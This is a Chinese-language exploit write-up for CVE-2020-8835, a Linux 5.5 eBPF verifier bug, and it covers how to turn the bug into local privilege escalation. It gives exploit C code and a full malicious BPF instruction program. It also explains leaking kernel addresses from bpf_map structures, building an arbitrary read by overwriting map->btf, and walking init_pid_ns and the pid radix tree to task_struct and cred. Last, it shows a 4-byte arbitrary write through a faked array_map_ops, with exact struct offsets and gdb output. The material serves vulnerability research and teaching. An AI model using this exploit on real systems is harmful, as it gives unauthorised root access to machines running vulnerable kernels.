该漏洞分析和利用思路作者已经公开,并且也有大佬公开了利用(见参考链接),所以本文就不再对漏洞原理进行分析,主要是对通过任意读写来提权的思路进行补充和分析。
环境和exp在附件中,内核版本下载:https://github.com/torvalds/linux/archive/v5.5.tar.gz
mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY,key_size,value_size,max_entries,0);
key_size:表示索引的大小范围,key_size=sizeof(int)=4.
value_size:表示map数组每个元素的大小范围,可以任意,只要控制在一个合理的范围
max_entries:表示map数组的大小,编写利用时将其设为1
bpf_create_fd 创建的是一整个bpf_array结构,我们传入的数据放在value[] 处
struct bpf_array { struct bpf_map map; u32 elem_size; u32 index_mask; struct bpf_array_aux *aux; union { char value[];//<--- elem void *ptrs[]; void *pptrs[]; }; }
value[]在bpf_array整个结构的偏移为0x110,所以*(&map-0x110)为bpf_map的结构地址
struct bpf_map { const struct bpf_map_ops *ops; struct bpf_map *inner_map_meta; void *security; enum bpf_map_type map_type; //.... u64 writecnt; }
bpf_map 有一个const struct bpf_map_ops *ops; 字段,当我们创建的map是BPF_MAP_TYPE_ARRAY 的时候保存的是array_map_ops, array_map_ops 是一个全局变量,可以用于泄露内核地址
&exp_elem[0]-0x110+0xc0(wait_list)处保存着指向自身的地址,用于泄露exp_elem的地址
(gdb) p/x &(*(struct bpf_array *)0x0)->map.freeze_mutex.wait_list $9 = 0xc0
通过BPF_OBJ_GET_INFO_BY_FD 命令进行任意读,BPF_OBJ_GET_INFO_BY_FD 会调用bpf_obj_get_info_by_fd:
case BPF_OBJ_GET_INFO_BY_FD: err = bpf_obj_get_info_by_fd(&attr, uattr);
#define BPF_OBJ_GET_INFO_BY_FD_LAST_FIELD info.info static int bpf_obj_get_info_by_fd(const union bpf_attr *attr, union bpf_attr __user *uattr) { int ufd = attr->info.bpf_fd; struct fd f; int err; if (CHECK_ATTR(BPF_OBJ_GET_INFO_BY_FD)) return -EINVAL; f = fdget(ufd); if (!f.file) return -EBADFD; if (f.file->f_op == &bpf_prog_fops) err = bpf_prog_get_info_by_fd(f.file->private_data, attr, uattr); else if (f.file->f_op == &bpf_map_fops) err = bpf_map_get_info_by_fd(f.file->private_data, attr, uattr); ……
之后调用bpf_map_get_info_by_fd:
static int bpf_map_get_info_by_fd(struct bpf_map *map, const union bpf_attr *attr, union bpf_attr __user *uattr) { struct bpf_map_info __user *uinfo = u64_to_user_ptr(attr->info.info); struct bpf_map_info info = {}; u32 info_len = attr->info.info_len; int err; err = bpf_check_uarg_tail_zero(uinfo, sizeof(info), info_len); if (err) return err; info_len = min_t(u32, sizeof(info), info_len); info.type = map->map_type; info.id = map->id; info.key_size = map->key_size; info.value_size = map->value_size; info.max_entries = map->max_entries; info.map_flags = map->map_flags; memcpy(info.name, map->name, sizeof(map->name)); if (map->btf) { info.btf_id = btf_id(map->btf); // 修改map->btf 就可以进行任意读,获得btf_id,在btf结构偏移0x54处 info.btf_key_type_id = map->btf_key_type_id; info.btf_value_type_id = map->btf_value_type_id; } if (bpf_map_is_dev_bound(map)) { err = bpf_map_offload_info_fill(&info, map); if (err) return err; } if (copy_to_user(uinfo, &info, info_len) || // 传到用户态的info中,泄露信息 put_user(info_len, &uattr->info.info_len)) return -EFAULT; return 0; }
u32 btf_id(const struct btf *btf) { return btf->id; } (gdb) p/x &(*(struct btf*)0)->id #获取id在btf结构中的偏移 $56 = 0x58 (gdb) p/x &(*(struct bpf_map_info*)0)->btf_id #获取btf_id在bpf_map_info中偏移 $57 = 0x40
所以只需要修改map->btf为target_addr-0x58,就可以泄露到用户态info中,泄漏的信息在struct bpf_map_info 结构偏移0x40处,由于是u32类型,所以只能泄露4个字节。
利用代码如下:
static uint32_t bpf_map_get_info_by_fd(uint64_t key, void *value, int mapfd, void *info) { union bpf_attr attr = { .map_fd = mapfd, .key = (__u64)&key, .value = (__u64)value, .info.bpf_fd = mapfd, .info.info_len = 0x100, .info.info = (__u64)info, }; syscall(__NR_bpf, BPF_OBJ_GET_INFO_BY_FD, &attr, sizeof(attr)); return *(uint32_t *)((char *)info+0x40); }
ksymtab 保存init_pid_ns结构的偏移,init_pid_ns字符串的偏移 kstrtab 保存init_pid_ns的字符串 (gdb) p &__ksymtab_init_pid_ns $48 = (<data variable, no debug info> *) 0xffffffff822f2578 (gdb) x/2wx 0xffffffff822f2578 0xffffffff822f2578: 0x001527c8 0x0000a1f9 (gdb) x/10s 0xffffffff822f257c+0xa1f9 0xffffffff822fc775 <__kstrtab_init_pid_ns>: "init_pid_ns" 0xffffffff822fc781 <__kstrtabns_kernel_param_unlock>: "" (gdb) x/10gx 0xffffffff822f2578+0x001527c8 0xffffffff82444d40 <init_pid_ns>: 0x0000000000000002 0x0080000400000000 0xffffffff82444d50 <init_pid_ns+16>: 0xffff88801e469242 0x0000006f00000000
所以我们通过搜索"init_pid_ns" 字符串可以得到kstrtab_init_pid_ns的地址,之后再通过搜索匹配 地址+该地址上四个字节(表示偏移)是否等于kstrtab_init_pid_ns的地址 来判断是否为ksymtab_init_pid_ns,此时找到的地址为ksymtab_init_pid_ns+4, 减去4就是ksymtab_init_pid_ns,上面有init_pid_ns结构的偏移,与ksymtab_init_pid_ns地址相加就可以得到init_pid_ns结构的地址。
之后通过pid 和 init_pid_ns查找对应pid的task_struct,这里其实就是要理清内核的查找过程,在写利用的时候模拟走一遍。最后找到task_struct中cred位置。
内核是通过find_task_by_pid_ns函数实现查找过程的:
struct task_struct *find_task_by_pid_ns(pid_t nr, struct pid_namespace *ns) { RCU_LOCKDEP_WARN(!rcu_read_lock_held(), "find_task_by_pid_ns() needs rcu_read_lock() protection"); return pid_task(find_pid_ns(nr, ns), PIDTYPE_PID); }
nr 为当前进程的pid,ns 为init_pid_ns结构地址,我们需要的是idr字段的内容
struct pid *find_pid_ns(int nr, struct pid_namespace *ns) { return idr_find(&ns->idr, nr); }
lib/idr.c: void *idr_find(const struct idr *idr, unsigned long id) { return radix_tree_lookup(&idr->idr_rt, id - idr->idr_base); }
需要获取&idr->idr_rt 和 idr->idr_base
lib/radix-tree.c: void *radix_tree_lookup(const struct radix_tree_root *root, unsigned long index) { return __radix_tree_lookup(root, index, NULL, NULL); }
void *__radix_tree_lookup(const struct radix_tree_root *root, unsigned long index, struct radix_tree_node **nodep, void __rcu ***slotp) { struct radix_tree_node *node, *parent; unsigned long maxindex; void __rcu **slot; restart: parent = NULL; slot = (void __rcu **)&root->xa_head; radix_tree_load_root(root, &node, &maxindex); //将root->xa_head的值赋给node if (index > maxindex) return NULL; while (radix_tree_is_internal_node(node)) { unsigned offset; parent = entry_to_node(node); // parent = node & 0xffff ffff ffff fffd offset = radix_tree_descend(parent, &node, index); //循环查找当前进程的node slot = parent->slots + offset; // if (node == RADIX_TREE_RETRY) goto restart; if (parent->shift == 0) // 当shift为0时,退出,说明找到当前进程的node break; } if (nodep) *nodep = parent; if (slotp) *slotp = slot; return node; }
重点看radix_tree_descend函数实现:
RADIX_TREE_MAP_MASK : 0x3f static unsigned int radix_tree_descend(const struct radix_tree_node *parent, struct radix_tree_node **nodep, unsigned long index) { unsigned int offset = (index >> parent->shift) & RADIX_TREE_MAP_MASK; // 要读取parent->shift的值,并与0x3f 与计算 void __rcu **entry = rcu_dereference_raw(parent->slots[offset]); // 获取parent->slots[offset] 作为下一个node *nodep = (void *)entry; // return offset; // }
radix_tree_node的结构如下:
#define radix_tree_node xa_node struct xa_node { unsigned char shift; /* Bits remaining in each slot */ unsigned char offset; /* Slot offset in parent */ unsigned char count; /* Total entry count */ unsigned char nr_values; /* Value entry count */ struct xa_node __rcu *parent; /* NULL at top of tree */ struct xarray *array; /* The array we belong to */ union { struct list_head private_list; /* For tree user */ struct rcu_head rcu_head; /* Used when freeing node */ }; void __rcu *slots[XA_CHUNK_SIZE]; union { unsigned long tags[XA_MAX_MARKS][XA_MARK_LONGS]; unsigned long marks[XA_MAX_MARKS][XA_MARK_LONGS]; }; };
获得当前进程的node后就可以通过pid_task获取相应的task_struct:
enum pid_type { PIDTYPE_PID, PIDTYPE_TGID, PIDTYPE_PGID, PIDTYPE_SID, PIDTYPE_MAX, }; type 为PIDTYPE_PID, 值为0 #define hlist_entry(ptr, type, member) container_of(ptr,type,member) struct task_struct *pid_task(struct pid *pid, enum pid_type type) { struct task_struct *result = NULL; if (pid) { struct hlist_node *first; first = rcu_dereference_check(hlist_first_rcu(&pid->tasks[type]), //获取&pid->tasks[0] 的内容 lockdep_tasklist_lock_is_held()); if (first) result = hlist_entry(first, struct task_struct, pid_links[(type)]);// first为pid_links[0]的地址,由此获得task_struct的起始地址 } return result; }
相关结构字段的偏移:
(gdb) p/x &(*(struct task_struct *)0)->pid_links[0] $8 = 0x500 (gdb) p/x &(*(struct pid*)0x0)->tasks[0] $10 = 0x8
在exp_elem上填充伪造的array_map_ops,伪造的array_map_ops中将map_push_elem 填充为map_get_next_key ,这样调用map_push_elem时就会调用map_get_next_key ,并将&exp_elem[0]的地址覆盖到exp_map[0],同时要修改 map 的一些字段绕过一些检查
spin_lock_off = 0 max_entries = 0xffff ffff //写入的index要满足(index >= array->map.max_entries), 将map_entries改成0xffff ffff map_type = BPF_MAP_TYPE_STACK //map 的类型是BPF_MAP_TYPE_QUEUE或者BPF_MAP_TYPE_STACK时,map_update_elem 会调用map_push_elem
最后调用bpf_update_elem任意写内存
bpf_update_elem->map_update_elem(mapfd, &key, &value, flags) -> map_push_elem(被填充成 map_get_next_key ) ->array_map_get_next_key
static int array_map_get_next_key(struct bpf_map *map, void *key, void *next_key) { struct bpf_array *array = container_of(map, struct bpf_array, map); u32 index = key ? *(u32 *)key : U32_MAX; u32 *next = (u32 *)next_key; if (index >= array->map.max_entries) { //index *next = 0; return 0; } if (index == array->map.max_entries - 1) return -ENOENT; *next = index + 1; return 0; }
map_push_elem 的参数是value 和 uattr 的 flags, 分别对应array_map_get_next_key 的 key 和 next_key 参数,之后有index = value[0],next = flags , 最终效果是 *flags = value[0]+1,这里index 和 next 都是 u32 类型, 所以可以任意地址写 4个byte。
执行的bpf_insn注释:
struct bpf_insn my_prog[] = { //-------- ctrl_mapfd BPF_LD_MAP_FD(BPF_REG_9,ctrl_mapfd), BPF_MAP_GET(0,BPF_REG_8), BPF_MOV64_REG(BPF_REG_6, BPF_REG_0), /* r_dst = (r0) */ BPF_LD_IMM64(BPF_REG_2,0x4000000000), BPF_LD_IMM64(BPF_REG_3,0x2000000000), BPF_LD_IMM64(BPF_REG_4,0xFFFFffff), BPF_LD_IMM64(BPF_REG_5,0x1), BPF_JMP_REG(BPF_JGT,BPF_REG_8,BPF_REG_2,5), BPF_JMP_REG(BPF_JLT,BPF_REG_8,BPF_REG_3,4), BPF_JMP32_REG(BPF_JGT,BPF_REG_8,BPF_REG_4,3), BPF_JMP32_REG(BPF_JLT,BPF_REG_8,BPF_REG_5,2), BPF_ALU64_REG(BPF_AND,BPF_REG_8,BPF_REG_4), BPF_JMP_IMM(BPF_JA, 0, 0, 2), BPF_MOV64_IMM(BPF_REG_0,0x0), BPF_EXIT_INSN(), //-------- exp_mapfd BPF_LD_MAP_FD(BPF_REG_9,exp_mapfd), BPF_MAP_GET_ADDR(0,BPF_REG_7), BPF_ALU64_REG(BPF_SUB,BPF_REG_7,BPF_REG_8), // r7 = r7-0x110 BPF_LDX_MEM(BPF_DW,BPF_REG_0,BPF_REG_7,0), // r7 = &exp_elem[0]-0x110 , 获得array_map_ops的地址 BPF_STX_MEM(BPF_DW,BPF_REG_6,BPF_REG_0,0x10), // leak *(&exp_elem[0]-0x110) BPF_LDX_MEM(BPF_DW,BPF_REG_0,BPF_REG_7,0xc0), // leak *(&exp_elem[0]-0x110+0xc0) wait_list BPF_STX_MEM(BPF_DW,BPF_REG_6,BPF_REG_0,0x18), //泄露 wait_list保存的地址,该地址指向自身,所以此处用于泄露exp_map的地址 BPF_ALU64_IMM(BPF_ADD,BPF_REG_0,0x50), // r0 = &exp_map[0],计算前r0和r7的值相同,但为什么用r0计算,因为r0是map中的数据,而r7是指针,不能往map中写指针 // &ctrl[0]+0x8 -> op BPF_LDX_MEM(BPF_DW,BPF_REG_8,BPF_REG_6,0x8), // r8 = op BPF_JMP_IMM(BPF_JNE, BPF_REG_8, 1, 4), BPF_STX_MEM(BPF_DW,BPF_REG_7,BPF_REG_0,0), // r7=&exp_elem[0]-0x110,即&exp_map[0] BPF_ST_MEM(BPF_W,BPF_REG_7,0x18,BPF_MAP_TYPE_STACK),//map type BPF_ST_MEM(BPF_W,BPF_REG_7,0x24,-1),// max_entries BPF_ST_MEM(BPF_W,BPF_REG_7,0x2c,0x0), //lock_off BPF_MOV64_IMM(BPF_REG_0,0x0), BPF_EXIT_INSN(), };
所以利用的整体思路是:
https://www.thezdi.com/blog/2020/4/8/cve-2020-8835-linux-kernel-privilege-escalation-via-improper-ebpf-program-verification
https://www.anquanke.com/post/id/203416
https://github.com/rtfingc/cve-repo/tree/master/0x04-pwn2own-ebpf-jmp32-cve-2020-8835
https://biscuitos.github.io/blog/RADIX-TREE___radix_tree_lookup/
http://sourcelink.top/2019/09/26/linux-kernel-radix-tree-analysis/